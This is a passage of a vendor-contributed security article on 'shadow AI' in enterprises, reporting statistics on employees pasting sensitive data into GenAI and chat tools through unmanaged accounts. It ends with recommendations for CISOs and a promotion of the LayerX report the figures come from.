    The twist? This explosive growth hasn’t been accompanied by governance. Instead, the vast majority of AI sessions happen outside enterprise control. 67% of AI usage occurs through unmanaged personal accounts, leaving CISOs blind to who is using what, and what data is flowing where.

    Sensitive Data Is Everywhere, and It’s Moving the Wrong Way

    Perhaps the most surprising and alarming finding is how much sensitive data is already flowing into AI platforms: 40% of files uploaded into GenAI tools contain PII or PCI data, and employees are using personal accounts for nearly four in ten of those uploads.

    Even more revealing: files are only part of the problem. The real leakage channel is copy/paste. 77% of employees paste data into GenAI tools, and 82% of that activity comes from unmanaged accounts. On average, employees perform 14 pastes per day via personal accounts, with at least three containing sensitive data.

    That makes copy/paste into GenAI the #1 vector for corporate data leaving enterprise control. It’s not just a technical blind spot; it’s a cultural one. Security programs designed to scan attachments and block unauthorized uploads miss the fastest-growing threat entirely.

    The Identity Mirage: Corporate ≠ Secure

    Security leaders often assume that “corporate” accounts equate to secure access. The data proves otherwise. Even when employees use corporate credentials for high-risk platforms like CRM and ERP, they overwhelmingly bypass SSO: 71% of CRM and 83% of ERP logins are non-federated.

    That makes a corporate login functionally indistinguishable from a personal one. Whether an employee signs into Salesforce with a Gmail address or with a password-based corporate account, the outcome is the same: no federation, no visibility, no control.

    The Instant Messaging Blind Spot

    While AI is the fastest-growing channel of data leakage, instant messaging is the quietest. 87% of enterprise chat usage occurs through unmanaged accounts, and 62% of users paste PII/PCI into them. The convergence of shadow AI and shadow chat creates a dual blind spot where sensitive data constantly leaks into unmonitored environments.

    Together, these findings paint a stark picture: security teams are focused on the wrong battlefields. The war for data security isn’t in file servers or sanctioned SaaS. It’s in the browser, where employees blend personal and corporate accounts, shift between sanctioned and shadow tools, and move sensitive data fluidly across both.

    Rethinking Enterprise Security for the AI Era

    The report’s recommendations are clear, and unconventional:

    1. Treat AI security as a core enterprise category, not an emerging one. Governance strategies must put AI on par with email and file sharing, with monitoring for uploads, prompts, and copy/paste flows.
    2. Shift from file-centric to action-centric DLP. Data is leaving the enterprise not just through file uploads but through file-less methods such as copy/paste, chat, and prompt injection. Policies must reflect that reality.
    3. Restrict unmanaged accounts and enforce federation everywhere. Personal accounts and non-federated logins are functionally the same: invisible. Restricting their use – whether fully blocking them or applying rigorous context-aware data control policies – is the only way to restore visibility.
    4. Prioritize high-risk categories: AI, chat, and file storage. Not all SaaS apps are equal. These categories demand the tightest controls because they are both high-adoption and high-sensitivity.

    The Bottom Line for CISOs

    The surprising truth revealed by the data is this: AI isn’t just a productivity revolution, it’s a governance collapse. The tools employees love most are also the least controlled, and the gap between adoption and oversight is widening every day.

    For security leaders, the implications are urgent. Waiting to treat AI as “emerging” is no longer an option. It’s already embedded in workflows, already carrying sensitive data, and already serving as the leading vector for corporate data loss.

    The enterprise perimeter has shifted again, this time into the browser. If CISOs don’t adapt, AI won’t just shape the future of work, it will dictate the future of data breaches.

    The new research report from LayerX provides the full scope of these findings, offering CISOs and security teams unprecedented visibility into how AI and SaaS are really being used inside the enterprise. Drawing on real-world browser telemetry, the report details where sensitive data is leaking, which blind spots carry the greatest risk, and what practical steps leaders can take to secure AI-driven workflows. For organizations seeking to understand their true exposure and how to protect themselves, the report delivers the clarity and guidance needed to act with confidence.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…